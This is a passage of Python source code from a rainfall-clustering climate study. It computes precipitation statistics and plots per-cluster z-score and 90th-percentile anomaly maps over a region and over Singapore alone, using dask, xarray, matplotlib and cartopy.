print(f'"{criteria}_serialized_{clus}{location_tag}.pkl" not found.')
found = acquire_rf_subset(model, criteria, clus, location_tag)
utils.to_pickle(f"{criteria}_serialized_{clus}{location_tag}", found, model.cluster_dir)
if type(found) == str:
pkl = utils.open_pickle(found)
else: pkl = found # for when cluster-wise, this is not a path but the actual numpy array
if calculation == "mean" and len(pkl.shape) >2:
daskarr = da.from_array(pkl, chunks=(500, pkl.shape[1], pkl.shape[2]))
return daskarr.mean(axis=0).compute() *100
elif calculation == "std" and len(pkl.shape) >2:
daskarr = da.from_array(pkl, chunks=(500, pkl.shape[1], pkl.shape[2]))
return daskarr.std(axis=0).compute() *100
elif calculation == "90perc" and len(pkl.shape) >2:
print('got back')
if too_large:
pkl = pkl.chunk({'time':-1, 'lon':2, 'lat':2})
return pkl.quantile(0.9, dim='time').persist().values
else:
return np.percentile(pkl.values, 90, axis=0)
elif calculation == "10perc" and len(pkl.shape) >2:
print('got back')
if too_large:
pkl = pkl.chunk({'time':-1, 'lon':2, 'lat':2})
return pkl.quantile(0.1, dim='time').persist().values
else:
return np.percentile(pkl.values, 10, axis=0)
# da.map_blocks(np.percentile, pkl, axis=0, q=q)
# daskarr = da.from_array(pkl, chunks=(500, pkl.shape[1], pkl.shape[2]))
# print('yer')
# percentile_rank_lst = []
# for p in range(pkl.shape[1]):
# for k in range(pkl.shape[2]):
# pkl_ = pkl[:, p, k]
# percentile_rank_lst.append(np.percentile(pkl_, 90))
# percentile_rank_lst = []
# for p in range(pkl.shape[1]):
# for k in range(pkl.shape[2]):
# pkl_ = pkl[:, p, k]
# percentile_rank_lst.append(np.percentile(pkl_, 90))
# daskarr = da.from_array(pkl, chunks=(500, pkl.shape[1], pkl.shape[2]))
# return da.percentile(pkl, 90).compute()
# return np.array(percentile_rank_lst).reshape(pkl.shape[1], pkl.shape[2])
else:# e.g. rf_ds_lon has None as <calculation>
return pkl
def print_rf_gt1mm_zscore(model, dest, optimal_k, too_large):
"""
Adopting the zscore plot from gt50mm for gt1mm
"""
rfstarttime = timer(); print(f'{utils.time_now()} - Plotting zscores of >1mm rainfall now.\nTotal of {optimal_k} clusters.')
two58_to_196 = plt.cm.gist_ncar(np.linspace(.75, .8, 3))
one96_to_0 = plt.cm.PuOr(np.linspace(0, 0.5, 4))
zero_to_196 = plt.cm.twilight(np.linspace(0, .4, 4))
one96_to_258 = plt.cm.gist_rainbow(np.linspace(.55, .3, 3))
all_colors = np.vstack((two58_to_196, one96_to_0, zero_to_196, one96_to_258))
terrain_map = colors.LinearSegmentedColormap.from_list('terrain_map', all_colors)
levels=np.linspace(-3, 3, 39)
ticks= [-2.58, -1.96, -1.65, -.67, .67, 1.65, 1.96, 2.58]
# if too_large:
# print('Its too large! Doing longer calculations to compensate...')
# std = get_RF_calculations(model, criteria="gt1mm", calculation="std")
# mean = get_RF_calculations(model, criteria="gt1mm", calculation="mean")
# rf_ds_lon = get_RF_calculations(model, criteria="rf_ds_lon")
# rf_ds_lat = get_RF_calculations(model, criteria="rf_ds_lat")
# else:
# RFprec_to_ClusterLabels_dataset = utils.open_pickle(model.RFprec_to_ClusterLabels_dataset_path).sel(
# lon=slice(model.LON_W, model.LON_E), lat=slice(model.LAT_S, model.LAT_N))
# whole_dataset = (RFprec_to_ClusterLabels_dataset.precipitationCal > 1).values
# std = np.std(whole_dataset, axis=0)
# mean = np.mean(whole_dataset, axis=0)
# rf_ds_lon = RFprec_to_ClusterLabels_dataset.lon
# rf_ds_lat = RFprec_to_ClusterLabels_dataset.lat
std = get_RF_calculations(model, criteria="gt1mm", calculation="std")
mean = get_RF_calculations(model, criteria="gt1mm", calculation="mean")
rf_ds_lon = get_RF_calculations(model, criteria="rf_ds_lon")
rf_ds_lat = get_RF_calculations(model, criteria="rf_ds_lat")
# if not too_large:
# fig, gs_rf_plot = create_multisubplot_axes(optimal_k)
# else:
# fig = plt.Figure(figsize=(10,10))
fig, gs_rf_plot = create_multisubplot_axes(optimal_k)
fig.suptitle(f'Z-scores for rainfall above 1mm, over region: {model.domain[0]}S {model.domain[1]}N {model.domain[2]}W {model.domain[3]}E. '\
f"Contour lines (in red) are drawn to indicate:\n-0.67<=Z<=0.67 == 50%, -1.65<=Z<=1.65 == 90%\n-1.96<=Z<=1.96 == 95%, -2.58<=Z<=2.58 == 99%", fontweight='bold')
for clus in range(optimal_k):
print(f'{utils.time_now()} - Plotting for cluster {clus+1}')
# if too_large:
# print(f'Doing the longform calcs for {clus+1}...')
# clus_proba_gt1mm = get_RF_calculations(model, criteria="gt1mm", calculation="mean", clus=clus)
# else:
# clus_dataset = (RFprec_to_ClusterLabels_dataset.where(RFprec_to_ClusterLabels_dataset.cluster==clus, drop=True).precipitationCal > 1).values
# clus_proba_gt1mm = np.mean(clus_dataset, axis=0)
clus_proba_gt1mm = get_RF_calculations(model, criteria="gt1mm", calculation="mean", clus=clus)
zscore = ((clus_proba_gt1mm-mean)/std)
zscore = np.nan_to_num(zscore)
# if too_large:
# ax_rf_plot = fig.add_subplot(111, projection=ccrs.PlateCarree())
# else:
# ax_rf_plot = fig.add_subplot(gs_rf_plot[clus], projection=ccrs.PlateCarree())
ax_rf_plot = fig.add_subplot(gs_rf_plot[clus], projection=ccrs.PlateCarree())
ax_rf_plot.set_title(f"Cluster {clus+1}")
ax_rf_plot.xaxis.set_major_formatter(model.lon_formatter)
ax_rf_plot.yaxis.set_major_formatter(model.lat_formatter)
ax_rf_plot.set_facecolor('w')
ax_rf_plot.set_extent([model.LON_W-1, model.LON_E+1, model.LAT_S-1, model.LAT_N+1])
ax_rf_plot.coastlines("50m", linewidth=.7, color='k')
ax_rf_plot.add_feature(cf.BORDERS, linewidth=.5, color='k', linestyle='dashed')
if too_large or not too_large and clus < model.grid_width: # top ticks
ax_rf_plot.set_xticks([np.round(i,0) for i in np.linspace(model.LON_W,model.LON_E,9)], crs=ccrs.PlateCarree())
#ax_rf_plot.set_xticklabels([int(i) for i in np.linspace(model.LON_W,model.LON_E,10)], rotation=55)
ax_rf_plot.xaxis.tick_top()
else: ax_rf_plot.set_xticks([])
if too_large or not too_large and clus % model.grid_width == model.grid_width - 1: # right-side ticks
ax_rf_plot.set_yticks([int(i) for i in np.linspace(model.LAT_S,model.LAT_N,10)], crs=ccrs.PlateCarree())
ax_rf_plot.yaxis.set_label_position("right")
ax_rf_plot.yaxis.tick_right()
else: ax_rf_plot.set_yticks([])
RF = ax_rf_plot.contourf(rf_ds_lon, rf_ds_lat, zscore.T,
levels,
cmap=terrain_map,
extend='both')
conts = ax_rf_plot.contour(RF, linewidths=0.15,
levels=ticks,
colors=('r',),linestyles=('-.',))
ax_rf_plot.clabel(conts, conts.levels, colors='k',
inline=True, fmt='%1.2f', fontsize=10)
# if not too_large and clus == model.cbar_pos: # cbar
# axins_rf = inset_axes(ax_rf_plot, width='100%', height='100%',
# loc='lower left', bbox_to_anchor=(0, -.8, model.grid_width, .1),
# bbox_transform=ax_rf_plot.transAxes)
# cbar_rf = fig.colorbar(RF, cax=axins_rf, ticks=[-2.58, -1.96, -1.65, -.67, 0, .67, 1.65, 1.96, 2.58], label='Zscore compared to baseline',
# orientation='horizontal', pad=0.01,
# )
# cbar_rf.ax.xaxis.set_ticks_position('top')
# cbar_rf.ax.xaxis.set_label_position('top')
# elif too_large:
# cbar_rf = fig.colorbar(RF, ticks=[-2.58, -1.96, -1.65, -.67, 0, .67, 1.65, 1.96, 2.58], label='Zscore compared to baseline',
# orientation='horizontal', pad=0.01,
# )
if clus == model.cbar_pos: # cbar
axins_rf = inset_axes(ax_rf_plot, width='100%', height='100%',
loc='lower left', bbox_to_anchor=(0, -.8, model.grid_width, .1),
bbox_transform=ax_rf_plot.transAxes)
cbar_rf = fig.colorbar(RF, cax=axins_rf, ticks=[-2.58, -1.96, -1.65, -.67, 0, .67, 1.65, 1.96, 2.58], label='Zscore compared to baseline',
orientation='horizontal', pad=0.01,
)
cbar_rf.ax.xaxis.set_ticks_position('top')
cbar_rf.ax.xaxis.set_label_position('top')
# fig.subplots_adjust(wspace=0.05,hspace=0.3)
# fn = f"{dest}/{model.month_names_joined}_RFplot_gt1mm_zscores_v1_cluster_{clus}_{model.gridsize}x{model.gridsize}"
# fig.savefig(fn, bbox_inches='tight', pad_inches=1)
# print(f'file saved @:\n{fn}')
# plt.close('all')
# if not too_large:
# fig.subplots_adjust(wspace=0.05,hspace=0.3)
# fn = f"{dest}/{model.month_names_joined}_RFplot_gt1mm_zscores_v1_{model.gridsize}x{model.gridsize}"
# fig.savefig(fn, bbox_inches='tight', pad_inches=1)
# print(f'file saved @:\n{fn}')
# plt.close('all')
fig.subplots_adjust(wspace=0.05,hspace=0.3)
fn = f"{dest}/{model.month_names_joined}_RFplot_rainday_gt1mm_zscores_v2_{model.gridsize}x{model.gridsize}"
fig.savefig(fn, bbox_inches='tight', pad_inches=1)
print(f'file saved @:\n{fn}')
plt.close('all')
print(f"\n -- Time taken is {utils.time_since(rfstarttime)}\n")
# sys.exit()
def print_rf_heavy_gt50mm_zscore(model, dest, optimal_k, too_large):
"""
Unlike gt1mm, gt50mm is only in very small percentages, hence it's useful to bypass the issue of the 0-1% range
and simply use population mean and std to calculate z-scores of each cluster.
"""
rfstarttime = timer(); print(f'{utils.time_now()} - Plotting zscores of >50mm rainfall now.\nTotal of {optimal_k} clusters.')
two58_to_196 = plt.cm.gist_ncar(np.linspace(.75, .8, 3))
one96_to_0 = plt.cm.PuOr(np.linspace(0, 0.5, 4))
zero_to_196 = plt.cm.twilight(np.linspace(0, .4, 4))
one96_to_258 = plt.cm.gist_rainbow(np.linspace(.55, .3, 3))
all_colors = np.vstack((two58_to_196, one96_to_0, zero_to_196, one96_to_258))
terrain_map = colors.LinearSegmentedColormap.from_list('terrain_map', all_colors)
levels=np.linspace(-3, 3, 39)
ticks= [-2.58, -1.96, -1.65, -.67, .67, 1.65, 1.96, 2.58]
# RFprec_to_ClusterLabels_dataset = utils.open_pickle(model.RFprec_to_ClusterLabels_dataset_path).sel(
# lon=slice(model.LON_W, model.LON_E), lat=slice(model.LAT_S, model.LAT_N))
fig, gs_rf_plot = create_multisubplot_axes(optimal_k)
rf_ds_lon = get_RF_calculations(model, criteria="rf_ds_lon")
rf_ds_lat = get_RF_calculations(model, criteria="rf_ds_lat")
fig.suptitle(f'Z-scores for rainfall above 50mm, over region: {model.domain[0]}S {model.domain[1]}N {model.domain[2]}W {model.domain[3]}E. '\
f"Contour lines (in red) are drawn to indicate:\n-0.67<=Z<=0.67 == 50%, -1.65<=Z<=1.65 == 90%\n-1.96<=Z<=1.96 == 95%, -2.58<=Z<=2.58 == 99%", fontweight='bold')
# whole_dataset = (RFprec_to_ClusterLabels_dataset.precipitationCal > 50).values
# std = np.std(whole_dataset, axis=0)
# mean = np.mean(whole_dataset, axis=0)
std = get_RF_calculations(model, criteria="gt50mm", calculation="std")
mean = get_RF_calculations(model, criteria="gt50mm", calculation="mean")
rf_ds_lon = get_RF_calculations(model, criteria="rf_ds_lon")
rf_ds_lat = get_RF_calculations(model, criteria="rf_ds_lat")
for clus in range(optimal_k):
print(f'{utils.time_now()} - Plotting cluster {clus+1} now')
# clus_dataset = (RFprec_to_ClusterLabels_dataset.where(RFprec_to_ClusterLabels_dataset.cluster==clus, drop=True).precipitationCal > 50).values
# clus_proba_gt50mm = np.mean(clus_dataset, axis=0)
clus_proba_gt50mm = get_RF_calculations(model, criteria="gt50mm", calculation="mean", clus=clus)
zscore = ((clus_proba_gt50mm-mean)/std)
zscore = np.nan_to_num(zscore)
ax_rf_plot = fig.add_subplot(gs_rf_plot[clus], projection=ccrs.PlateCarree())
ax_rf_plot.set_title(f"Cluster {clus+1}")
ax_rf_plot.xaxis.set_major_formatter(model.lon_formatter)
ax_rf_plot.yaxis.set_major_formatter(model.lat_formatter)
ax_rf_plot.set_facecolor('w')
ax_rf_plot.set_extent([model.LON_W-1, model.LON_E+1, model.LAT_S-1, model.LAT_N+1])
ax_rf_plot.coastlines("50m", linewidth=.7, color='k')
ax_rf_plot.add_feature(cf.BORDERS, linewidth=.5, color='k', linestyle='dashed')
if clus < model.grid_width: # top ticks
ax_rf_plot.set_xticks([np.round(i,0) for i in np.linspace(model.LON_W,model.LON_E,9)], crs=ccrs.PlateCarree())
#ax_rf_plot.set_xticklabels([int(i) for i in np.linspace(model.LON_W,model.LON_E,10)], rotation=55)
ax_rf_plot.xaxis.tick_top()
else: ax_rf_plot.set_xticks([])
if clus % model.grid_width == model.grid_width - 1: # right-side ticks
ax_rf_plot.set_yticks([int(i) for i in np.linspace(model.LAT_S,model.LAT_N,10)], crs=ccrs.PlateCarree())
ax_rf_plot.yaxis.set_label_position("right")
ax_rf_plot.yaxis.tick_right()
else: ax_rf_plot.set_yticks([])
RF = ax_rf_plot.contourf(rf_ds_lon, rf_ds_lat, zscore.T,
levels,
cmap=terrain_map,
extend='both')
conts = ax_rf_plot.contour(RF, linewidths=0.15,
levels=ticks,
colors=('y',),linestyles=('-.',))
ax_rf_plot.clabel(conts, conts.levels, colors='k',
inline=True, fmt='%1.2f', fontsize=10)
if clus == model.cbar_pos: # cbar
axins_rf = inset_axes(ax_rf_plot, width='100%', height='100%',
loc='lower left', bbox_to_anchor=(0, -.8, model.grid_width, .1),
bbox_transform=ax_rf_plot.transAxes)
cbar_rf = fig.colorbar(RF, cax=axins_rf, ticks=[-2.58, -1.96, -1.65, -.67, 0, .67, 1.65, 1.96, 2.58],
label='Zscore compared to baseline',
orientation='horizontal', pad=0.01,
)
cbar_rf.ax.xaxis.set_ticks_position('top')
cbar_rf.ax.xaxis.set_label_position('top')
print(f"\n -- Time taken is {utils.time_since(rfstarttime)}\n")
fig.subplots_adjust(wspace=0.05,hspace=0.3)
fn = f"{dest}/{model.month_names_joined}_RFplot_heavy_gt50mm_zscores_v2_{model.gridsize}x{model.gridsize}"
fig.savefig(fn, bbox_inches='tight', pad_inches=1)
print(f'file saved @:\n{fn}')
plt.close('all')
# sys.exit()
def print_rf_heavy_gt50mm_SGonly_zscore(model, dest, optimal_k, too_large):
"""
Added in 29 Mar
"""
rfstarttime = timer(); print(f'{utils.time_now()} - Plotting zscores of >50mm rainfall now (SG-only).\nTotal of {optimal_k} clusters.')
two58_to_196 = plt.cm.gist_ncar(np.linspace(.75, .8, 30))
one96_to_0 = plt.cm.PuOr(np.linspace(0, 0.5, 40))
zero_to_196 = plt.cm.twilight(np.linspace(0, .4, 40))
one96_to_258 = plt.cm.gist_rainbow(np.linspace(.55, .3, 30))
all_colors = np.vstack((two58_to_196, one96_to_0, zero_to_196, one96_to_258))
terrain_map = colors.LinearSegmentedColormap.from_list('terrain_map', all_colors)
# levels=np.linspace(-3, 3, 69)
levels = [np.round(i, 2) for i in np.linspace(-3, 3, 215)]
ticks= [-2.58, -1.96, -1.65, -.67, .67, 1.65, 1.96, 2.58]
fig, gs_rf_plot = create_multisubplot_axes(optimal_k)
rf_ds_lon = get_RF_calculations(model, criteria="rf_ds_lon", sgonly=True)
rf_ds_lat = get_RF_calculations(model, criteria="rf_ds_lat", sgonly=True)
fig.suptitle(f'Z-scores for rainfall above 50mm, over region: {model.domain[0]}S {model.domain[1]}N {model.domain[2]}W {model.domain[3]}E. '\
f"Contour lines (in red) are drawn to indicate:\n-0.67<=Z<=0.67 == 50%, -1.65<=Z<=1.65 == 90%\n-1.96<=Z<=1.96 == 95%, -2.58<=Z<=2.58 == 99%", fontweight='bold')
w = rf_ds_lon.min().values
e = rf_ds_lon.max().values
s = rf_ds_lat.min().values
n = rf_ds_lat.max().values
std = get_RF_calculations(model, criteria="gt50mm", calculation="std", sgonly=True)
mean = get_RF_calculations(model, criteria="gt50mm", calculation="mean", sgonly=True)
for clus in range(optimal_k):
print(f'{utils.time_now()} - Plotting cluster {clus+1} now')
clus_proba_gt50mm = get_RF_calculations(model, criteria="gt50mm", calculation="mean", clus=clus, sgonly=True)
zscore = ((clus_proba_gt50mm-mean)/std)
zscore = np.nan_to_num(zscore)
ax_rf_plot = fig.add_subplot(gs_rf_plot[clus], projection=ccrs.PlateCarree())
ax_rf_plot.set_title(f"Cluster {clus+1}")
ax_rf_plot.xaxis.set_major_formatter(model.lon_formatter)
ax_rf_plot.yaxis.set_major_formatter(model.lat_formatter)
ax_rf_plot.set_facecolor('w')
# ax_rf_plot.set_extent([model.LON_W-1, model.LON_E+1, model.LAT_S-1, model.LAT_N+1])
ax_rf_plot.set_extent([w, e, s, n])
ax_rf_plot.coastlines("50m", linewidth=.7, color='k')
ax_rf_plot.add_feature(cf.BORDERS, linewidth=.5, color='k', linestyle='dashed')
if clus < model.grid_width: # top ticks
ax_rf_plot.set_xticks([np.ceil(w), np.floor(e)], crs=ccrs.PlateCarree())
ax_rf_plot.set_xticklabels([np.ceil(w), np.floor(e)], rotation=55)
# ax_rf_plot.set_xticks([np.round(i,0) for i in np.linspace(model.LON_W,model.LON_E,9)], crs=ccrs.PlateCarree())
ax_rf_plot.xaxis.tick_top()
else: ax_rf_plot.set_xticks([])
if clus % model.grid_width == model.grid_width - 1: # right-side ticks
ax_rf_plot.set_yticks([s,n], crs=ccrs.PlateCarree())
# ax_rf_plot.set_yticks([int(i) for i in np.linspace(model.LAT_S,model.LAT_N,10)], crs=ccrs.PlateCarree())
ax_rf_plot.yaxis.set_label_position("right")
ax_rf_plot.yaxis.tick_right()
else: ax_rf_plot.set_yticks([])
RF = ax_rf_plot.contourf(rf_ds_lon, rf_ds_lat, zscore.T,
levels,
cmap=terrain_map,
extend='both')
conts = ax_rf_plot.contour(RF, linewidths=0.15,
levels=ticks,
colors=('y',),linestyles=('-.',))
ax_rf_plot.clabel(conts, conts.levels, colors='k',
inline=True, fmt='%1.2f', fontsize=10)
if clus == model.cbar_pos: # cbar
axins_rf = inset_axes(ax_rf_plot, width='100%', height='100%',
loc='lower left', bbox_to_anchor=(0, -.8, model.grid_width, .1),
bbox_transform=ax_rf_plot.transAxes)
cbar_rf = fig.colorbar(RF, cax=axins_rf, ticks=[-2.58, -1.96, -1.65, -.67, 0, .67, 1.65, 1.96, 2.58],
label='Zscore compared to baseline',
orientation='horizontal', pad=0.01,
)
cbar_rf.ax.xaxis.set_ticks_position('top')
cbar_rf.ax.xaxis.set_label_position('top')
print(f"\n -- Time taken is {utils.time_since(rfstarttime)}\n")
fig.subplots_adjust(wspace=0.05,hspace=0.3)
fn = f"{dest}/{model.month_names_joined}_RFplot_heavy_gt50mm_SGonly_zscores_v3_{model.gridsize}x{model.gridsize}"
fig.savefig(fn, bbox_inches='tight', pad_inches=1)
print(f'file saved @:\n{fn}')
plt.close('all')
# sys.exit()
def print_rf_heavy_gt1mm_SGonly_zscore(model, dest, optimal_k, too_large):
"""
Added in 7 Apr
"""
rfstarttime = timer(); print(f'{utils.time_now()} - Plotting zscores of >1mm rainfall now (SG-only).\nTotal of {optimal_k} clusters.')
two58_to_196 = plt.cm.gist_ncar(np.linspace(.75, .8, 30))
one96_to_0 = plt.cm.PuOr(np.linspace(0, 0.5, 40))
zero_to_196 = plt.cm.twilight(np.linspace(0, .4, 40))
one96_to_258 = plt.cm.gist_rainbow(np.linspace(.55, .3, 30))
all_colors = np.vstack((two58_to_196, one96_to_0, zero_to_196, one96_to_258))
terrain_map = colors.LinearSegmentedColormap.from_list('terrain_map', all_colors)
# levels=np.linspace(-3, 3, 69)
levels = [np.round(i, 2) for i in np.linspace(-3, 3, 215)]
ticks= [-2.58, -1.96, -1.65, -.67, .67, 1.65, 1.96, 2.58]
fig, gs_rf_plot = create_multisubplot_axes(optimal_k)
rf_ds_lon = get_RF_calculations(model, criteria="rf_ds_lon", sgonly=True)
rf_ds_lat = get_RF_calculations(model, criteria="rf_ds_lat", sgonly=True)
fig.suptitle(f'Z-scores for rainfall above 1mm, over region: {model.domain[0]}S {model.domain[1]}N {model.domain[2]}W {model.domain[3]}E. '\
f"Contour lines (in red) are drawn to indicate:\n-0.67<=Z<=0.67 == 50%, -1.65<=Z<=1.65 == 90%\n-1.96<=Z<=1.96 == 95%, -2.58<=Z<=2.58 == 99%", fontweight='bold')
w = rf_ds_lon.min().values
e = rf_ds_lon.max().values
s = rf_ds_lat.min().values
n = rf_ds_lat.max().values
std = get_RF_calculations(model, criteria="gt1mm", calculation="std", sgonly=True)
mean = get_RF_calculations(model, criteria="gt1mm", calculation="mean", sgonly=True)
for clus in range(optimal_k):
print(f'{utils.time_now()} - Plotting cluster {clus+1} now')
clus_proba_gt1mm = get_RF_calculations(model, criteria="gt1mm", calculation="mean", clus=clus, sgonly=True)
zscore = ((clus_proba_gt1mm-mean)/std)
zscore = np.nan_to_num(zscore)
ax_rf_plot = fig.add_subplot(gs_rf_plot[clus], projection=ccrs.PlateCarree())
ax_rf_plot.set_title(f"Cluster {clus+1}")
ax_rf_plot.xaxis.set_major_formatter(model.lon_formatter)
ax_rf_plot.yaxis.set_major_formatter(model.lat_formatter)
ax_rf_plot.set_facecolor('w')
ax_rf_plot.set_extent([w, e, s, n])
ax_rf_plot.coastlines("50m", linewidth=.7, color='k')
ax_rf_plot.add_feature(cf.BORDERS, linewidth=.5, color='k', linestyle='dashed')
if clus < model.grid_width: # top ticks
ax_rf_plot.set_xticks([np.ceil(w), np.floor(e)], crs=ccrs.PlateCarree())
ax_rf_plot.set_xticklabels([np.ceil(w), np.floor(e)], rotation=55)
ax_rf_plot.xaxis.tick_top()
else: ax_rf_plot.set_xticks([])
if clus % model.grid_width == model.grid_width - 1: # right-side ticks
ax_rf_plot.set_yticks([s,n], crs=ccrs.PlateCarree())
ax_rf_plot.yaxis.set_label_position("right")
ax_rf_plot.yaxis.tick_right()
else: ax_rf_plot.set_yticks([])
RF = ax_rf_plot.contourf(rf_ds_lon, rf_ds_lat, zscore.T,
levels,
cmap=terrain_map,
extend='both')
conts = ax_rf_plot.contour(RF, linewidths=0.15,
levels=ticks,
colors=('y',),linestyles=('-.',))
ax_rf_plot.clabel(conts, conts.levels, colors='k',
inline=True, fmt='%1.2f', fontsize=10)
if clus == model.cbar_pos: # cbar
axins_rf = inset_axes(ax_rf_plot, width='100%', height='100%',
loc='lower left', bbox_to_anchor=(0, -.8, model.grid_width, .1),
bbox_transform=ax_rf_plot.transAxes)
cbar_rf = fig.colorbar(RF, cax=axins_rf, ticks=[-2.58, -1.96, -1.65, -.67, 0, .67, 1.65, 1.96, 2.58],
label='Zscore compared to baseline',
orientation='horizontal', pad=0.01,
)
cbar_rf.ax.xaxis.set_ticks_position('top')
cbar_rf.ax.xaxis.set_label_position('top')
print(f"\n -- Time taken is {utils.time_since(rfstarttime)}\n")
fig.subplots_adjust(wspace=0.05,hspace=0.3)
fn = f"{dest}/{model.month_names_joined}_RFplot_rainday_gt1mm_SGonly_zscores_v2_{model.gridsize}x{model.gridsize}"
fig.savefig(fn, bbox_inches='tight', pad_inches=1)
print(f'file saved @:\n{fn}')
plt.close('all')
# sys.exit()
def print_rf_90th_percentile_ANOM_plots(model, dest, optimal_k, too_large):
"""
i.e. taking the values but subtracting the baseline
"""
rfstarttime = timer(); print(f'{utils.time_now()} - Plotting 90th-perc rainfall now.\nTotal of {optimal_k} clusters.')
# RFprec_to_ClusterLabels_dataset = utils.open_pickle(model.RFprec_to_ClusterLabels_dataset_path).sel(
# lon=slice(model.LON_W, model.LON_E), lat=slice(model.LAT_S, model.LAT_N))
# if not too_large:
# fig, gs_rf_plot = create_multisubplot_axes(optimal_k)
# else:
# fig = plt.Figure(figsize=(10,10))
fig, gs_rf_plot = create_multisubplot_axes(optimal_k)
# rf_ds_lon = RFprec_to_ClusterLabels_dataset.lon
# rf_ds_lat = RFprec_to_ClusterLabels_dataset.lat
# baseline = get_baseline_90perc(RFprec_to_ClusterLabels_dataset)
baseline = get_RF_calculations(model, criteria="90perc", calculation="90perc")
print('Baseline calculated')
rf_ds_lon = get_RF_calculations(model, criteria="rf_ds_lon")
rf_ds_lat = get_RF_calculations(model, criteria="rf_ds_lat")
all_colors = np.vstack(plt.cm.terrain_r(np.linspace(0,1,11)))
terrain_map = colors.LinearSegmentedColormap.from_list('terrain_map', all_colors)
fig.suptitle(f'Anomaly for 90th percentile RF over region: {model.domain[0]}S {model.domain[1]}N {model.domain[2]}W {model.domain[3]}E', fontweight='bold')
levels = [int(i) for i in np.linspace(-100,100,21)]
for clus in range(optimal_k):
print(f'{utils.time_now()}: Cluster {clus} now.. ')
time.sleep(1); gc.collect()
# data = RFprec_to_ClusterLabels_dataset.where(RFprec_to_ClusterLabels_dataset.cluster==clus, drop=True).precipitationCal.values
# mean = np.percentile(data, 90, axis=0)
mean = get_RF_calculations(model, criteria="90perc", calculation="90perc", clus=clus, too_large=too_large)
mean = mean-baseline
time.sleep(1); gc.collect()
# if too_large:
# ax_rf_plot = fig.add_subplot(111, projection=ccrs.PlateCarree())
# else:
# ax_rf_plot = fig.add_subplot(gs_rf_plot[clus], projection=ccrs.PlateCarree())
ax_rf_plot = fig.add_subplot(gs_rf_plot[clus], projection=ccrs.PlateCarree())
ax_rf_plot.xaxis.set_major_formatter(model.lon_formatter)
ax_rf_plot.yaxis.set_major_formatter(model.lat_formatter)
ax_rf_plot.set_facecolor('w')
ax_rf_plot.set_extent([model.LON_W-1, model.LON_E+1, model.LAT_S-1, model.LAT_N+1])
ax_rf_plot.coastlines("50m", linewidth=.7, color='k')
ax_rf_plot.add_feature(cf.BORDERS, linewidth=.5, color='k', linestyle='dashed')
ax_rf_plot.set_title(f"cluster no.{clus+1}", loc='left')
# if too_large or not too_large and clus < model.grid_width: # top ticks
if clus < model.grid_width: # top ticks
ax_rf_plot.set_xticks(np.linspace(model.LON_W,model.LON_E,10), crs=ccrs.PlateCarree())
ax_rf_plot.set_xticklabels([int(i) for i in np.linspace(model.LON_W,model.LON_E,10)], rotation=55)
ax_rf_plot.xaxis.tick_top()
else: ax_rf_plot.set_xticks([])
# if too_large or not too_large and clus % model.grid_width == model.grid_width - 1: # right-side ticks
if clus % model.grid_width == model.grid_width - 1: # right-side ticks
ax_rf_plot.set_yticks([int(i) for i in np.linspace(model.LAT_S,model.LAT_N,10)], crs=ccrs.PlateCarree())
ax_rf_plot.yaxis.set_label_position("right")
ax_rf_plot.yaxis.tick_right()
else: ax_rf_plot.set_yticks([])
RF = ax_rf_plot.contourf(rf_ds_lon, rf_ds_lat, mean.T,
levels,
cmap=terrain_map,
extend='neither')
conts = ax_rf_plot.contour(RF, 'w', linewidths=0)
ax_rf_plot.clabel(conts, conts.levels, colors='k', inline=True, fmt='%1.f', fontsize=8)
# if not too_large and clus == model.cbar_pos: # cbar
if clus == model.cbar_pos: # cbar
axins_rf = inset_axes(ax_rf_plot, width='100%', height='100%',
loc='lower left', bbox_to_anchor=(0, -.8, model.grid_width, .1),
bbox_transform=ax_rf_plot.transAxes)
cbar_rf = fig.colorbar(RF, cax=axins_rf, ticks=levels,
label='Anomaly of 90th percentile RF (in mm) relative to baseline.', orientation='horizontal', pad=0.01)
cbar_rf.ax.xaxis.set_ticks_position('top')
cbar_rf.ax.xaxis.set_label_position('top')
# elif too_large:
# cbar_rf = fig.colorbar(RF, ticks=[-2.58, -1.96, -1.65, -.67, 0, .67, 1.65, 1.96, 2.58],
# label='Anomaly of 90th percentile RF (in mm) relative to baseline.', orientation='horizontal', pad=0.01)
# fig.subplots_adjust(wspace=0.05,hspace=0.3)
# fn = f"{dest}/{model.month_names_joined}_RFplot_90th_percentile_ANOM_v1_cluster_{clus}_{model.gridsize}x{model.gridsize}"
# fig.savefig(fn, bbox_inches='tight', pad_inches=1)
# print(f'file saved @:\n{fn}')
# plt.close('all')
# if not too_large:
# fig.subplots_adjust(wspace=0.05,hspace=0.3)
# fn = f"{dest}/{model.month_names_joined}_RFplot_90th_percentile_ANOM_v1_{model.gridsize}x{model.gridsize}"
# fig.savefig(fn, bbox_inches='tight', pad_inches=1)
# print(f'file saved @:\n{fn}')
# plt.close('all')
fig.subplots_adjust(wspace=0.05,hspace=0.3)
fn = f"{dest}/{model.month_names_joined}_RFplot_90th_percentile_ANOM_v1_{model.gridsize}x{model.gridsize}"
fig.savefig(fn, bbox_inches='tight', pad_inches=1)
print(f'file saved @:\n{fn}')
plt.close('all')
print(f"\n -- Time taken is {utils.time_since(rfstarttime)}\n")
def print_rf_90th_percentile_SGonly_ANOM_plots(model, dest, optimal_k):
"""
i.e. taking the values but subtracting the baseline
"""
rfstarttime = timer(); print(f'{utils.time_now()} - Plotting 90th-perc rainfall over SG now.\nTotal of {optimal_k} clusters, now printing cluster: ')
RFprec_to_ClusterLabels_dataset = utils.open_pickle(model.RFprec_to_ClusterLabels_dataset_path)
w_lim_sg = 103.5
e_lim_sg = 104.055
s_lim_sg = 1.1
n_lim_sg = 1.55
RFprec_to_ClusterLabels_dataset = RFprec_to_ClusterLabels_dataset.sel(lon=slice(w_lim_sg, e_lim_sg),lat=slice(s_lim_sg, n_lim_sg))
fig, gs_rf_plot = create_multisubplot_axes(optimal_k)
rf_ds_lon = RFprec_to_ClusterLabels_dataset.lon
rf_ds_lat = RFprec_to_ClusterLabels_dataset.lat
w = rf_ds_lon.min().values
e = rf_ds_lon.max().values
s = rf_ds_lat.min().values
n = rf_ds_lat.max().values
baseline = np.percentile(RFprec_to_ClusterLabels_dataset.precipitationCal, 90, axis=0)
all_colors = np.vstack(plt.cm.terrain_r(np.linspace(0,1,11)))
terrain_map = colors.LinearSegmentedColormap.from_list('terrain_map', all_colors)
# fig.suptitle(f'Anomaly for 90th percentile RF over region: {model.domain[0]}S {model.domain[1]}N {model.domain[2]}W {model.domain[3]}E', fontweight='bold')
fig.suptitle(f'Anomaly for 90th percentile RF over SG-only: {model.domain[0]}S {model.domain[1]}N {model.domain[2]}W {model.domain[3]}E', fontweight='bold')
